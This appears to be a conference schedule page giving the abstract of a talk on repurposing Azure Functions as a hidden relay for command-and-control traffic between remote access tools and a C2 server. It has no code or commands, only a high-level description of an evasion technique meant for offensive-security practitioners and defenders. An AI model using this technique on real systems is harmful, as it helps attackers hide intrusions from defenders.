Back To Schedule
Thursday, March 12 • 1:00pm - 1:50pm
Building Functional C2 with Azure

Sign up or log in to save this to your schedule, view media, leave feedback and see who's attending!

Feedback form is now closed.
 Building out command and control has seen multiple iterations over the years. The original build-out that most attackers utilized involved obtaining access to a server (via compromise or purchase) to use for C2 in addition to leveraging a domain to direct all traffic to an endpoint they control. Attackers, and the offensive security community, have expanded their arsenal and have started to use cloud services via domain fronting to hide their C2 traffic within legitimate web services. However, defenders have been also been developing their own techniques to detect these techniques.
As with any cat and mouse game, attackers will continue to innovate. Microsoft Azure has functionality beyond CDN access and virtual machines. Specifically, Microsoft Azure also has “Azure Functions” that allow a user to execute “serverless code” when a specific action, or trigger, occurs. We’ve developed a method to use Microsoft Functions to be a middle-man for command and control. Azure Functions not only allows remote access tools to authenticate to a C2 server, but Functions also hides all traffic between the RAT the C2 server itself.
Azure Functions offers similar benefits to domain fronting and doesn’t require the server resources that an Apache or IPTABLES based redirector needs. Attendees will walk away from this talk with an understanding of how Azure Functions can be repurposed for command and control by an attacker using legitimate cloud services.